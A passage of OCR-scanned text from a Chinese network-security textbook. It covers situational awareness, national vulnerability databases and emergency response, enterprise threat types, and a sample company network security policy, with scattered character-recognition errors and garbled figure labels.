管理 人 员 能 理解 的 较为 完整 的 宏观 网 络 态势 知识 ,帮助 网 络 管理 人 员 理 解 网 络 所 处 的 状 
态 和 下 一 步 发 展 的 趋势 ,为 网 络 部 署 和 应 急 决 策 提 供 依据 。 网 络 安全 态势 感知 模型 与 内 
容 如 图 2.2 所 示 。 


上 攻击 者 意图 三 级 SA) 


威胁 评估 ， 方 法 ; 
基于 图 的 意图 识别 、 因 果 关 联 、 概 率 统计 


上 攻击 者 二 级 SA) 


威胁 检测 ， 方 法 : 
模型 、 统 计 、 人 工 智能 、 数 据 挖掘 、 机 器 学 习 


上 攻击 事 作 (级 SA) 


数据 源 : = 
IDS、 密 钠 、DNS 异 常 警报 攻击 检测 


图 2.2 网 络 安全 态势 感知 模型 与 内 容 


态势 感知 技术 分 类 如 图 2. 3 所 示 。 


封闭 环境 
环境 类 型 < 
开放 式 环境 
环境 管理 
应 用 类 型 |- 安全 监测 
工业 控制 
因果 关联 分 析 
< 全 事件 统计 
本 体 模型 


区 
反 鲁 一 一半 

, 有 决策 目标 
决策 一 一 无 决策 目标 


人 为 人 工 感知 
因素 < 自动 感知 


图 2.3 态势 感知 技术 分 类 
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3. 信息 安全 共享 数据 库 


信息 安全 共享 数据 库 的 搭建 是 为 了 给 其 他 信息 安全 机 构 、 设 施 等 提供 漏洞 信息 发 
布 .漏洞 分 析 、 风 险 评估 等 服务 及 信息 安全 知识 共享 的 服务 。 现 今 我 国 已 有 许多 信息 安 
全 共享 数据 库 , 例 如 ,国家 信息 安全 漏洞 共享 平台 (China National Vulnerability 
Database,CNVD)。 该 平台 是 由 国家 计算 机 网 络 应 急 技术 处 理 协调 中 心 (中 文 简称 国家 
互联 应 急 中 心 ,英文 简称 CNCERT) 联 合 国内 重要 信息 系统 单位 .基础 电信 运营 商 、 网 络 
安全 厂商 ,软件 厂商 和 互联 网 企业 建立 的 信息 安全 漏洞 信息 共享 知识 库 。 建 立 CNVD 的 
主要 目标 , 即 与 国家 政府 部 门 、 重 要 信息 系统 有 用户、 运营 商 ,主要 安全 厂商 、 软 件 厂商 、 科 
研 机 构 .公共 互联 网 用 户 等 共同 建立 软件 安全 漏洞 统一 收集 验证 、 预 警 发 布 及 应 急 处 置 
体系 ,切实 提升 我 国 在 安全 漏洞 方面 的 整体 研究 水 平和 及 时 预防 能 力 ,进而 提高 我 国信 
息 系 统 及 国产 软件 的 安全 性 ,带动 国内 相关 安全 产品 的 发 展 。 类 似 的 平台 还 有 乌云 漏洞 
平台 (WooYun) 等 。CNVD2014 年 度 成 员 单 位 发 现 或 共享 漏洞 的 排名 如 图 2. 4 所 示 。 
成 员 单 位 工作 贡献 排名 (2014-01-01 一 2014-12-31) 周 月 年 
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4. 网 络 应 急 响应 体系 


网 络 应 急 响 应 体系 是 一 种 被 动 性 的 安全 体系 , 它 是 持续 运行 并 由 一 定 条 件 触 发 的 体 
系 。 直 接 推动 该 机 制 建立 的 是 20 世纪 80 年 代 末期 发 生 在 西方 的 两 起 重大 信息 安全 事 
件 。 第 一 起 是 “英里 斯 蠕虫 "人 侵 互联 网 。12 小 时 内 , 几 千 台 工 作 站 与 小 型 机 陷入 瘫痪 状 
态 , 不 计 其 数 的 资料 和 数据 毁 于 一 旦 ,造成 的 损失 近 亿 美元 。 第 二 起 是 美国 和 西 德 联手 
破获 了 前 苏联 收买 西 德 大 学 生 何 可 ,渗入 欧美 十 余 个 国家 的 计算 机 ,获取 大 量 敏感 信息 
的 计算 机 间谍 案 。 因 此 ,建立 一 种 全 新 的 安全 防护 及 管理 机 制 以 应 对 日 益 严峻 的 网 络 安 
全 状况 成 为 共识 。 应 急 响应 体系 为 及 时 处 理 漏洞 .防御 攻击 .恢复 系统 提供 相关 服务 ,是 
保证 政府 ,社会 .经济 等 正常 运转 的 重要 基础 。 我 国 国家 公共 网 络 安全 事件 应 急 处 理 体 
系 如 图 2.5 所 示 。 
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2.5 国家 公共 网 络 安全 事件 应 急 处 理 体系 


5. 信息 安全 产品 测试 与 系统 评估 等 


信息 安全 产品 测试 与 系统 评估 是 确保 安全 产品 、 系 统 、 服 务 可 靠 的 重要 手段 。 我 国 
目前 建设 有 中 国信 息 安全 测评 中 心 ,该 测评 中 心 是 我 国 专门 从 事 信 息 技术 安全 测试 和 风 
险 评估 的 权威 职能 机 构 。 测 评 中 心 的 主要 职能 包括 : 负责 信息 技术 产品 和 系统 的 安全 漏 
洞 分 析 与 信息 通报 ;负责 党 政 机 关 信息 网 络 .重要 信息 系统 的 安全 风险 评估 ;开展 信息 技 
术 产品 、 系 统 和 工程 建设 的 安全 性 测试 与 评估 ;开展 信息 安全 服务 和 专业 人 员 的 能 力 评 
人 与 资质 审核 ;从 事 信 息 安 全 测试 评估 的 理论 研究 、 技 术 研 发 .标准 研制 等 。 该 测评 中 心 
也 是 国家 信息 安全 保障 体系 中 的 重要 基础 设施 之 一 ,在 国家 专项 投入 的 支持 下 ,拥有 国 
内 一 流 的 信息 安全 漏洞 分 析 资 源 和 测试 评估 技术 装备 ; 建 有 漏洞 基础 研究 、 应 用 软件 安 
全 产品 安全 检测 、 系 统 隐 患 分 析 和 测评 装备 研发 等 多 个 专业 性 技术 实验 室 ; 具 有 专门 面 
向 党 政 机关 、 基 础 信息 网 络 和 重要 信息 系统 开展 风险 评估 的 国家 专 控 队 伍 。 除 了 权威 职 
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能 机 构 , 还 有 许多 民间 测评 机 构 且 形式 多 样 ,例如 ,漏洞 盒子 、 威 客 众 测 平台 、 补 天 漏洞 响 
应 平台 等 ,都 能 提供 有 偿 或 无 偿 的 漏洞 测试 。 中 国信 息 安全 测评 中 心 产品 测试 流程 如 
图 2.6 所 示 。 中 国信 息 安全 测评 中 心 系 统 评估 流程 如 图 2.7 所 示 。 
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2.6 中国 信息 安全 测评 中 心 产品 测试 流程 


217 经 费 为 网 络 信息 安全 保障 提供 经 济 支持 


经 费 是 保障 互联 网 安全 的 经 济 基础 。 网 络 安全 结合 了 管理 与 技术 ,若是 没有 经 费 保 
障 一 切 都 难以 进行 。 在 美国 2014 年 国防 预算 草案 中 ,奥巴马 将 网 络 安全 经 费 大 幅 增 至 
47 亿美 元 ,以 拦截 来 自 他 国 的 网 络 攻 击 。 白 宫 管理 和 预算 办 公 室 发 言 人 称 ,各 部 门 网 络 
安全 预算 经 费 总 额 达 130 亿美 元 , 约 合 人 民 币 800 多 亿 元 , 增加 了 约 10 亿美 元 。 在 欧美 
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2.7 中 国信 息 安全 测评 中 心 系统 评估 流程 
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国家 逐渐 加 大 对 网 络 安全 投入 的 情况 下 ,我 们 国家 也 需要 保证 网 络 安全 方面 的 各 项 
经 费 。 

首先 ,经 费 能 有 效 地 支持 互联 网 监管 .测评 等 职能 性 工作 。 互 联网 已 经 成 为 国家 重 
要 的 基础 设施 之 一 ,融入 到 生活 的 方方面面 。 对 互联 网 的 监管 .应 急 响 应 、 互 联网 相关 的 
设备 、 系 统 、 安 全 测试 与 评估 等 ,都 是 保障 互联 网 持续 有 效 提供 服务 的 关键 。 这 些 工作 都 
需要 大 量 的 经 费 投入 来 维持 ,并 且 由 政府 与 相关 机 构 共 同 开展 或 直接 由 政府 牵头 。 

其 次 ,许多 基础 性 .公益 性 安全 技术 .产品 .设施 的 研发 也 需要 经 费 进 行 推动 。 实 际 
上 ,有 许多 关键 技术 进行 市 场 化 运作 短期 内 无 法 收回 成 本 ,并 且 由 于 特殊 的 大 环境 许多 
研发 工作 交 给 市 场 来 实现 无 法 达到 预期 的 效果 。 但 要 做 到 技术 不 落后 于 人 ,就 需要 国家 
加 大 对 这 方面 的 经 费 支 持 。 

最 后 ,许多 重点 领域 需要 专项 安全 经 费 加 以 支持 。 这 些 领 域 涉及 基础 设施 、 金 融 秩 
序 等 ,这 些 关键 领域 一 旦 出 现 问题 ,将 严重 的 危及 到 经 济 健康 快速 发 展 . 社 会 繁荣 稳定 、 
人 民 的 生命 与 财产 安全 等 。 在 这 方面 投入 的 资金 已 不 是 企业 所 能 承担 , 且 这 些 关 键 领域 
的 信息 安全 应 完全 掌握 在 国家 手中 ,这 就 要 求 国家 加 大 对 这 方面 的 资金 投入 。 


218 人 才 为 网 络 信息 安全 保障 提供 核心 动力 


在 2014 年 2 月 27 日 召开 的 中 央 网 络 安 全 和 信息 化 领导 小 组 第 一 次 会 议 上 ,习近平 
总 书记 明确 指出 ,建设 网 络 强国 需要 高 素质 的 网 络 安全 和 信息 化 人 才 队 伍 。 网 络 空间 安 
全 人 才 是 国家 网 络 安全 建设 的 核心 资源 ,其 数量 .质量 及 结构 是 国家 网 络 安全 软 实 力 和 
竞争 力 的 重要 标志 。 保 障 互联 网 安全 ,应 坚持 以 人 为 本 。 

首先 ,我 国 应 出 台 网 络 安全 人 才 顶 层 规 划 。 纵 观 发 达 国 家 ,美国 在 2011 年 9 月 由 国 
土 安全 部 和 人 力 资源 办 公 室 牵头 提出 (网 络 安全 人 才 队 伍 框架 (草案 )》,2012 年 9 月 还 专 
门 针 对 网 络 安全 人 才 队 伍 建 设 发 布 了 “NICE 战略 计划 ”; 欧 盟 在 2013 年 2 月 发 布 (网 络 
安全 战略 ) 提 出 ,各 成 员 国 要 在 国家 层面 重视 网 络 安全 方面 的 教育 与 培训 ,学 校 要 开展 网 
络 安全 培训 ,对 计算 机 科学 专业 学 生 进 行 网 络 安全 、 网 络 软件 开发 以 及 个 人 数据 保护 的 
培训 ,对 公务 员 进 行 网 络 安全 方面 的 培训 。 可 见 , 从 国家 战略 高 度 统一 部 署 , 组 织 多 方 力 
量 加 强国 家 网 络 安 全 人 才 顶 层 设 计 势 在 必 行 。 

其 次 ,应 有 具备 一 定安 全 知识 的 管理 型 人 才 为 互联 网 安全 监管 .企业 或 部 门 互联 网 
安全 管理 提供 支持 。 互 联网 安全 管理 与 一 般 的 管理 工作 有 许多 不 同 ,要求 管理 者 了 解 互 
联网 安全 相关 的 知识 ,并 具备 一 定 的 应 急 处 理 能 力 。 因 此 ,具备 良好 网 络 安全 管理 知识 
的 管理 型 人 才能 够 更 好 地 判断 互联 网 威胁 趋势 、 对 网 络 威胁 做 出 适当 的 判断 、 有 针对 性 
地 采取 防护 措施 。 

最 后 ,强化 高 校对 网 络 安 全 人 才 的 培养 。 加 强 我 国 网 络 安全 学 科 建 设 , 扩 大 网 络 安 
全 专业 人 才 招生 数量 ,逐步 实现 我 国 网 络 安全 人 才 体 系 化 、 规 模 化 培养 。 引 导 和 支持 高 
等 院 校 设置 相关 专业 完善 课程 体系 、 转 变 教学 模式 。 加 强 高 校 网 络 安全 实验 室 建设 , 提 
升 高 校 实验 课程 设置 和 指导 能 力 , 为 学 生 提 供 实践 环境 。 鼓 励 用 人 单位 和 高 校 联合 培 
养 ,大 力 推动 产 学 研 相 结合 的 培养 模式 。 
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Mi:s 


22 组 织 与 企业 层面 的 网 络 安全 


随 着 市 场 竞争 的 日 益 加 剧 ,业务 灵活 性 与 成 本 控制 成 为 企业 经 营 者 最 关心 的 问题 。 
传统 企 事业 弹性 的 业务 流程 需求 日 益 加 强 , 办 公 自 动 化 .生产 上 网 、 业 务 上 网 、 远 程 办 公 
等 业务 模式 不 断 出 现 。 互 联网 企业 更 是 如 此 ,许多 互联 网 企业 的 核心 业务 、 数 据 都 在 网 
上 呈现 。 互 联网 给 政府 机 构 \ 企 事业 单位 带 来 了 巨大 的 变革 ,也 帮助 企业 提高 了 办 事 效 
率 与 市 场 反 应 能 力 。 因 此 一 个 稳定 、 安 全 、 高 效 的 企业 信息 网 络 已 成 为 企 事业 单位 正常 
运行 的 基本 条 件 。 

网 络 安 全 是 全 方位 的 ,整体 的 .动态 变 化 的 ,如 果 仅 仅 依靠 对 优秀 产品 优秀 服务 的 
选择 来 构建 网 络 安全 体系 ,那么 网 络 的 安全 会 由 于 相对 孤立 的 “产品 ,服务 ”的 安全 策略 
而 无 法 对 网 络 整体 安全 情况 进行 全 面 了 解 进 而 无 法 根据 网 络 应 用 动态 情况 调整 安全 策 
略 ,最 终 造 成 漏洞 危害 网 络 的 整体 安全 。 因 此 ,统一 的 \ 动 态 的 .联动 的 网 络 安全 理念 才 
能 更 大 程度 地 保证 网 络 的 安全 性 。 

联动 作为 网 络 安全 解决 方案 的 重要 思想 ,能 在 一 定 程度 上 提高 网 络 的 安全 性 ,提高 
安全 系统 使 用 成 效 , 更 有 效 地 保障 客户 应 用 ,降低 企业 信息 化 经 营 的 风险 ,提高 企业 的 投 
资 回报 率 。 管 理 (Manage)、 防 护 (Protection) .监测 (Detection)、 审 计 (Audit)、 服 务 
(Server) 为 联动 的 5 大 组 成 因素 。 管 理 ,主要 是 指 设备 管理 、 人 员 管 理 、 策 略 管理 等 ; 防 
护 ,该 环节 的 包括 保密 性 、 完 整 性 可用性、 不 可 否认 性 ,主要 依靠 一 些 相 关 的 技术 手段 来 
实现 ;监测 ,主要 是 指 实 时 监测 、 系 统 加 固 、 漏 洞 修补 等 ,实时 监测 主要 依靠 风险 评估 和 脆 
弱 性 分 析 软 件 ,系统 加 固 和 漏洞 修补 要 求人 员 能 够 随时 跟踪 各 种 和 应 用 系统 漏洞 情况 及 
时 采取 必要 的 措施 ;审计 ,主要 是 指 各 种 收集 ,存储 、 分 析 、 统 计 ` 反馈、 取证 等 ,包含 很 多 
方面 ,对 于 出 入 网 络 边界 的 审计 和 对 于 主要 服务 器 、 安 全 设备 审计 是 审计 环节 的 关键 两 
个 部 分 ;服务 ,一 个 优秀 的 网 络 安全 系统 的 建立 不 仅仅 依靠 网 络 安全 设备 和 相关 安全 手 
段 ,还 需要 服务 为 其 他 环节 提供 保障 。 它 们 之 间 的 联动 主要 体现 在 : 一 是 防火 墙 、 入 侵 检 
测 系统 IDS 及 病毒 防范 系统 间 的 联动 ,能 解决 IDS 的 漏 报 误 报 问 题 和 防火 墙 、. 病 毒 防 范 
系统 的 局 限 性 问题 ,使 防护 .检测 两 个 环节 之 间 的 联动 得 以 实现 ;二 是 网 管 平 台 与 所 有 安 
全 设备 间 的 联动 ,使 得 防护 ,监测 审计、 管理 四 个 环节 之 间 联 动 起 来 ,方便 了 对 安全 产 
品 、 安 全 策略 的 统一 管理 和 执行 ,提高 了 网 络 的 安全 性 ;三 是 安全 审计 平台 与 其 他 安全 产 
品 的 联动 ,通过 安全 审计 平台 与 其 他 安全 产品 的 联动 ,对 网 络 中 所 有 安全 日 志 、 信 息 进行 
集中 整理 ,分 析 了 解 网 络 的 整体 安全 状况 ,为 安全 策略 的 动态 调整 提供 决策 支持 ,从 而 实 
现 审计 与 防护 监测 等 环节 之 间 的 联动 ;四 是 安全 服务 与 其 他 各 环节 之 间 的 联动 ,从 网 络 
安全 状况 的 评估 、 安 全 方案 的 设计 、 安 全 集成 一 直到 应 急 响 应 服务 ,专业 的 安全 服务 都 将 
与 管理 .防护 ,监测 .审计 等 环节 结合 ,通过 服务 使 得 其 他 各 环节 能 够 发 挥 更 大 的 作用 , 达 
到 最 大 化 的 效果 。 


221 组 织 与 企业 网 络 安全 的 三 个 方面 
目前 , 企 事业 单位 种 类 繁多 ,业务 模式 各 有 不 同 ,规模 大 小 各 异 ,所 面临 的 安全 威胁 
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也 有 些许 差异 。 但 大 体 上 可 以 分 为 三 类 : 第 一 类 是 外 部 威胁 ;第 二 类 是 内 部 威胁 ;第 三 类 
是 网 络 设备 的 安全 威胁 。 


1. 外 部 威胁 


外 部 威胁 主要 指 来 自 外 部 的 一 些 威胁 和 破坏 ,主要 是 体现 在 外 部 网 络 攻 击 , 也 就 是 
我 们 通常 所 说 的 黑客 威胁 。 当 前 大 多 数 电 信和 网 络 设备 和 服务 都 存在 着 被 入 侵 的 痕迹 ,其 
至 各 种 后 门 。 除 此 之 外 还 有 人 利用 系统 软件 或 数据 库存 在 的 安全 缺陷 ,破译 计算 机 系统 
口令 ,突破 系统 的 安全 防护 措施 ,修改 计算 机 网 络 系统 的 设置 和 相关 的 信息 , 锚 取 机 密 信 
息 。 甚 至 有 可 能 对 企业 电脑 形成 僵尸 网 络 ,成 为 黑客 手中 的 攻击 利器 。 这 些 是 对 网 络 自 
主 运行 控制 权 的 巨大 威胁 ,使 得 企业 在 重要 和 关键 应 用 场合 没有 信心 ,损失 业务 ,甚至 造 
成 灾难 性 后 果 。 还 有 就 是 病毒 ,病毒 对 信息 系统 的 正常 工作 运行 产生 很 大 影响 , 据 统计 ， 
信息 系统 的 60% 瘫 痰 是 由 于 感染 病毒 引起 的 。 


2. 内 部 威胁 


最 新 调查 显示 ,60% 以 上 的 员工 利用 网 络 处 理 私 人 事务 。 对 网 络 的 不 正当 使 用 , 降 
低 了 生产 率 、 阻 碍 电脑 网 络 、 消 耗 企业 网 络 资源 .引入 病毒 和 间谍 ,或 者 使 得 不 法 员工 可 
以 通过 网 络 泄露 企业 机 密 , 从 而 导致 企业 蒙受 巨大 的 的 损失 。 

对 组 织 有 意见 的 内 部 员工 可 能 通过 内 网 进行 恶意 操作 ,甚至 破坏 。 或 是 纯粹 是 因为 
好 奇 ,或 是 失误 等 其 他 原因 ,对 组 织 与 企业 的 网 络 系统 进行 攻击 ,造成 网 络 堵塞 ,甚至 导 
致 网 络 服务 器 系统 骨 溃 。 不 论 如 何 ,他 们 最 熟悉 服务 器 .小 程序 .脚本 和 系统 的 弱点 。 对 
于 已 经 离职 的 不 满员 工 ,可 以 通过 定期 改变 口令 和 删除 系统 记录 以 减少 这 类 风险 。 但 还 
有 心怀 不 满 的 在 职员 工 , 这 些 员工 比 已 经 离开 的 员工 能 造成 更 大 的 损失 ,例如 ,他 们 可 以 
传 出 至 关 重 要 的 信息 ,泄露 安全 重要 信息 、 错 误 地 进入 数据 库 、 删 除数 据 ,等 等 。 这 些 都 
是 许多 组 织 与 企业 内 部 网 络 中 潜 存 的 威胁 。 


3. 网络 设备 的 安全 威胁 


许多 组 织 与 企业 的 内 部 网 络 与 外 部 网 络 间 没有 采取 一 定 的 安全 防护 措施 ,内 部 网 络 
容易 遭 到 来 自 外 网 的 攻击 。 包 括 来 自 Internet 上 的 风险 和 下 级 单位 的 风险 。 内 部 局 域 
网 不 同 部 门 或 用 户 之 间 如 果 没 有 采用 相应 一 些 访问 控制 ,也 可 能 造成 信息 泄露 或 非法 攻 
击 。 据 调查 统计 ,发 生 的 网 络 安全 事件 中 ,80% 以 上 的 网 络 违规 事件 发 生 在 内 部 。 因 此 
内 部 网 的 安全 风险 更 严重 。 内 部 员工 对 自身 企业 网 络 结构 、 应 用 比较 熟悉 ,自己 攻击 或 
泄露 重要 信息 内 外 勾结 ,都 可 能 成 为 导致 系统 受 攻击 的 最 致命 安全 威胁 。 随 着 组 织 与 企 
业 的 发 展 壮 大 及 移动 办 公 的 普及 ,许多 组 织 与 企业 逐渐 形成 了 企业 总 部 、 各 地 分 支 机 构 、 
移动 办 公 人 员 这 样 的 新 型 互动 运营 模式 。 怎 么 处 理 总 部 与 分 支 机 构 、 移 动 办 公 人 员 的 信 
息 共享 安全 , 既 要 保证 信息 的 及 时 共享 ,又 要 防止 机 密 的 泄露 已 经 成 为 不 得 不 考虑 的 问 
题 。 各 地 机 构 与 总 部 之 间 的 网 络 连接 安全 直接 影响 企业 的 高 效 运作 。 
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222 组 织 与 企业 网 络 安全 应 该 如 何 实现 
1. 网 络 安全 意识 


随 着 信息 网 络 的 飞速 发 展 ,网 络 已 经 涉及 各 行 各 业 , 包 括 政府 、 军 事 、 金 融 等 。 信 息 
网 络 不 仅 作为 我 们 正常 沟通 交流 的 渠道 ,而 且 还 拥有 各 行 各 业 的 重要 数据 甚至 是 国家 军 
事 机 密 。 这 就 难免 会 遭 到 政治 对 手 、 商 业 敌 人 的 窃取 或 攻击 。 除 此 之 外 ,网 络 实体 本 身 
也 会 遭受 到 外 部 因素 的 侵害 ,例如 ,自然 灾害 、 断 电 、 偷 盗 等 情况 。 因 此 ,组 织 与 企业 需要 
提高 网 络 安全 意识 。 良 好 的 网 络 安全 意识 能 帮助 组 织 与 企业 无 论 是 在 初期 的 网 络 架设 
还 是 后 期 运 维 中 ,都 将 有 一 个 正确 、 清 晰 的 思维 方向 。 


2. 初期 网 络 建设 就 应 该 考虑 安全 


组 织 与 企业 级 别 的 安全 网 络 建设 应 当 包括 网 络 的 设计 与 构架 。 组 织 与 企业 有 了 良 
好 的 网 络 安全 意识 ,对 于 初期 的 网 络 建设 而 言 ,安全 性 是 组 织 与 企业 在 网 络 架设 中 考虑 
的 重要 因素 之 一 。 它 直接 决定 了 该 信息 网 络 的 健壮 性 ,后 期 使 用 的 高 可 用 性 、 高 性 能 等 
方面 。 

科学 合理 的 网 络 设计 师 实现 企业 级 网 络 安全 的 基础 。 这 需要 综合 考量 所 有 安全 因 
素 。 例 如 ,网 络 结构 是 否 合理 、 安 全 设备 的 选择 是 否 合理 ,安全 设备 的 布置 是 否 科 学 等 。 
一 个 优秀 的 网 络 设计 方案 必定 拥有 完美 的 安全 设计 部 分 。 有 了 科学 合理 的 网 络 设计 方 
案 ,才能 进行 网 络 构架 。 当 然 , 网 络 构架 也 是 十 分 重要 的 一 环 , 这 个 环节 应 当 严 格 遵守 前 
期 制定 好 的 方案 ,以 确保 初期 网 络 建设 的 质量 和 方便 后 期 的 运 维 。 


3. 网 络 安全 管理 条 例 


网 络 架设 之 后 ,我 们 应 当 如 何 正 确 地 使 用 它 ? 这 就 是 为 什么 要 制定 网 络 安全 管理 条 
例 。 我 们 在 之 前 内 部 威胁 中 就 提 到 ,80% 以 上 的 网 络 安全 违规 事件 都 是 发 生 在 内 部 , 因 
此 建立 一 套 完善 的 网 络 安全 条 例 来 规范 对 网 络 的 使 用 是 必 不 可 少 的 。 

我 们 可 以 来 看 一 个 网 络 安全 管理 条 例 简 单 的 范例 。 


XX 公司 网 络 安全 管理 制度 


为 加 强 公司 网 络 系统 的 安全 管理 ,防止 因 偶发 性 事件 、 网 络 病毒 等 造成 系统 故障 , 妨 
碍 正常 的 工作 秩序 ,特制 定 本 管理 办 法 。 

一 、 网 络 系统 的 安全 运行 ,是 公司 网 络 安全 的 一 个 重要 内 容 , 由 公司 专人 负责 网 络 系 
统 的 安全 运行 工作 。 

二 、 网 络 系统 的 安全 运行 包括 四 个 方面 : 一 是 网 络 系统 数据 资源 的 安全 保护 ;二 是 
网 络 硬件 设备 及 机 房 的 安全 运行 ;三 是 网 络 病毒 的 防治 管理 ;四 是 上 网 信息 的 安全 。 

(一 ) 数据 资源 的 安全 保护 。 网 络 系统 中 存储 的 各 种 数据 信息 ,是 生产 和 管理 所 必需 
的 重要 数据 ,数据 资源 的 破坏 将 严重 影响 生产 与 管理 工作 的 正常 运行 。 数 据 资 源 安 全 保 
护 的 主要 手段 是 数据 备份 ,规定 如 下 : 
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、 办 公 室 要 做 到 数据 必须 每 周一 备份 。 
、 财 务 部 要 做 到 数据 必须 每 日 一 备份 。 
、 一 般 用 机 部 门 要 做 到 数据 必须 每 周一 备份 。 
、 系 统 软 件 和 各 种 应 用 软件 要 采用 光盘 及 时 备份 。 
、 数 据 备份 时 必须 登记 以 备 检查 ,数据 备份 必须 正确 、 可 靠 。 
、 严 格 网 络 用 户 权 限 及 用 户 名 口令 管理 。 
(二 ) 硬件 设备 及 机 房 的 安全 运行 。 
1、 硬 件 设备 的 供电 电源 必须 保证 电压 及 频率 质量 ,一 般 应 同时 配 有 不 间断 供电 电 
源 ,避免 因 市 电 不 稳定 造成 硬件 设备 损坏 。 
2、 安 装 有 保护 接地 线 , 必 须 保 证 接地 电阻 符合 技术 要 求 (接地 电阻 过 2Q, 堆 地 电 
压 三 2V) ,避免 因 接地 安装 不 良 损坏 设备 。 
3、 设 备 的 检修 或 维护 、 操 作 必 须 严格 按 要 求 办 理 , 杜 绝 因 人 为 因素 破坏 硬件 设备 。 
4、 网 络 机 房 必 须 有 防盗 及 防火 措施 。 
5、 保 证 网 络 运行 环境 的 清洁 ,避免 因 积 灰 影 响 设 备 正常 运行 。 
三 ) 网 络 病毒 的 防治 。 
、 各 服务 器 必须 安装 防 病毒 软件 ,上 网 电脑 必须 保证 每 台电 脑 要 安装 防 病毒 软件 。 
、 定 期 对 网 络 系统 进行 病毒 检查 及 清理 。 
、 所 有 U 盘 须 检查 确认 无 病毒 后 , 方 能 上 机 使 用 。 
4、 严 格 控制 外 来 U 盘 的 使 用 ,各 部 门 使 用 外 来 U 盘 须 经 检验 认可 ,私自 使 用 造成 病 
毒 侵害 要 追究 当事人 责任 。 
5、 加 强 上 网 人 员 的 职业 道德 教育 ,严禁 在 网 上 玩 游戏 ,看 与 工作 无 关 的 网 站 ,下 载 歌 
曲 图 片 游戏 等 软件 ,一 经 发 现 将 严肃 处 理 。 
(四 ) 上 网 信息 的 安全 。 
1、 网 络 管理 员 必 须 定 期 对 上 网 信息 进行 检查 ,发 现 有 关 泄 露 企业 机 密 及 不 健康 信息 
要 及 时 删除 ,并 记录 ,随时 上 报 主管 领导 。 
2、 要 严格 执行 国家 相关 法 律 法 规 , 防 止 发 生 窃 密 、 泄 密 事件 。 外 来 人 员 未 经 单位 主 
管 领 导 批准 同意 ,任何 人 不 得 私自 让 外 来 人 员 使 用 我 公司 的 网 络 系统 作 任 何 用 途 。 
3、 要 加 强 对 各 网 络 安全 的 管理 检查、 监督 ,一 旦 发 现 问题 及 时 上 报 公司 负责 人 。 公 
司 计 算 机 安全 负责 人 分 析 并 指导 有 关 部 门 作 好 善后 处 理 , 对 造成 事故 的 责任 人 要 依据 情 
给 予 必要 的 经 济 及 行政 处 理 。 
三 、 未 经 公司 负责 人 批准 ,连接 在 公司 网 络 上 的 所 有 用 户 , 严 禁 再 通过 其 他 入 口上 因 
特 网 或 公司 外 单位 网 络 。 
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4. 网 络 安全 评估 


对 于 一 个 拥有 良好 网 络 安全 意识 的 网 络 管理 者 而 言 , 科 学 的 网 络 设计 和 构架 ,以 及 
健全 的 网 络 安全 条 例 的 实施 ,也 仅 是 “组 织 与 企业 及 网 络 安全 实施 ”的 前 半 部 分 。 互 联网 
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技术 在 飞速 发 展 ,伴随 着 病毒 和 攻击 也 在 不 断 发 展 , 当 网 络 使 用 到 一 定 程度 后 ,问题 是 一 
定 会 出 现 的 。 较 为 常见 的 状况 包含 有 后 期 的 管理 体制 较为 松懈 导致 的 安全 违规 事件 ; 安 
全 设施 未 进行 持续 维护 导致 新 型 病毒 的 侵入 ;已 有 的 安全 设施 无 法 抵挡 新 型 的 攻击 方式 
等 。 若 是 组 织 与 企业 自己 的 技术 人 员 无 法 解决 这 些 问 题 , 导 致 问题 被 搁置 .安全 问题 威 
胁 逐 步 扩 大 、 网 络 瘫痪 等 ,这 时 企业 就 需要 聘请 一 个 资深 的 网 络 安全 专家 团队 ,以 此 保障 
组 织 与 企业 全 方位 的 网 络 安全 ,使 其 良性 运行 。 网 络 安全 评估 小 组 会 对 组 织 与 企业 做 一 
个 全 方位 的 安全 评估 ,之 后 会 试验 并 整合 评估 信息 ,将 其 交 予 组 织 与 企业 ,让 组 织 与 企业 
实时 地 了 解 自己 网 络 的 状态 、 安 全 指数 等 信息 ,做 到 真正 了 解 自己 的 网 络 ,从 而 有 针对 性 
地 对 自身 网 络 进行 加 强 。 


5, 安全 加 固 


前 期 的 安全 评估 完成 后 ,网 络 安全 专家 团队 会 对 前 期 评估 信息 给 出 解决 方案 ,对 网 
络 进行 安全 加 固 。 比 如 补丁 的 更 新 、 安 全 策略 实施 、 新 管理 条 例 的 制定 等 。 


6. 安全 联动 


通常 ,组 织 与 企业 对 安全 违规 事件 有 自己 的 安全 报警 .安全 防御 系统 (例如 ,UTM 、 
IDS、IPS 等 ), 以 及 相应 的 管理 机 制 。 但 是 当 安全 违规 事件 发 生 , 只 能 通过 某 个 单一 的 方 
面 查找 安全 违规 事件 的 原因 与 该 单一 方面 的 解决 办 法 。 例 如 ,组 织 与 企业 网 络 上 的 IDS 
指出 某 一 台 主 机 正在 遭受 攻击 ,而 组 织 与 企业 网 络 管理 人 员 往 往 只 针对 该 主机 进行 处 
理 , 比 如 ,更 新 补丁 ,更 新 杀毒 程序 . 防 堵 漏洞 等 ,而 没有 一 个 全 局 性 的 检查 。 网 络 安全 联 
动 性 的 中 心思 想 就 是 如 何 根据 全 局 进行 很 好 的 联动 。 当 安全 违规 事件 发 生 后 ,注意 力 并 
不 是 全 部 放 在 事故 点 上 面 ,而 是 本 着 联动 的 思想 ,全 方位 的 取证 ,并 结合 科学 的 实验 ,从 
而 找 出 违规 根源 ,对 症 下 药 。 除 此 之 外 ,安全 联动 性 还 应 体现 在 安全 防御 上 。 利 用 自己 
手中 的 安全 资源 ,将 其 联动 起 来 ,网 络 才 能 更 加 坚固 。 即 使 再 次 发 生 安全 违规 事件 ,也 可 
以 多 方 取证 、 对照 调查 ,从 而 减少 误 报 ,而 非 仅 靠 一 项 数据 .一 台 设 备 来 判断 问题 。 


223 组 织 与 企业 网 络 安全 包含 的 范围 
1. 资产 安全 


组 织 与 企业 的 资产 包括 有 形 资产 与 无 形 资产 两 个 方面 。 无 形 资产 是 指 不 具有 实物 
形态 ,但 能 带 来 经 济 利益 的 资产 。 在 企业 中 ,我 们 将 其 视 为 包括 商标 权 、 专 利 权 、 专 有 技 
术 ., 合 同 、 秘 诀 、 销 售 系统 、 客 户 名 单 .专家 网 等 方面 。 有 形 资产 是 指 那 些 具有 实物 形态 的 
资产 。 在 企业 中 ,我 们 将 其 视 为 包括 流动 资产 、 固 定 资产 .机 械 设备 \ 土 地、 房屋 等 方面 。 
但 在 组 织 与 企业 的 网 络 安全 中 ,对 无 形 资产 的 安全 包括 逻辑 访问 安全 与 数据 存储 安全 。 
对 有 形 资 产 的 安全 包括 环节 安全 ,设备 安全 、 媒 体 安 全 及 管理 安全 。 

1) 无 形 资产 安全 (数据 安全 ) 

